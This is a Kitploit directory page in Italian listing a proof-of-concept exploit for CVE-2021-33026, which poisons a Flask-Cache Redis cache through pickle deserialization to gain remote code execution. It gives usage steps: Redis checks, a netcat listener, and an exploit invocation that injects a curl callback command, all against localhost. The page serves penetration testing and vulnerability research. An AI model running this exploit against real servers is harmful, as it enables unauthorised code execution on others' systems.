Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FlaskCache_CVE-2021-33026_POC — Prova di concetto di exploit per CVE-2021-33026 che dimostra l'avvelenamento della cache Redis in Flask-Cache tramite deserializzazione pickle per ottenere esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubagilevatester/flaskcache_cve-2021-33026_poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

FlaskCache_CVE-2021-33026_POC

Prova di concetto di exploit per CVE-2021-33026 che dimostra l'avvelenamento della cache Redis in Flask-Cache tramite deserializzazione pickle per ottenere esecuzione remota di codice.

Vedi Repository
17 mesi faNon ancora revisionato

Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit


Verifica che il server redis sia attivo e funzionante

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


Avvia netcat in ascolto sulla porta 10001:

nc -nvlp 10001


Impostazione degli ambienti per Flask Chache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Impostazione degli ambienti per Flask Chache 2.3.0

Esegui l'app Flask e crea una chiave cache:

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Ottieni il valore della chiave cache dall'app Flask

curl --request GET http://localhost:5000/cache/[key]

Sfruttamento di Flask Cache avvelenando la cache Redis:

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

Scarica lo strumento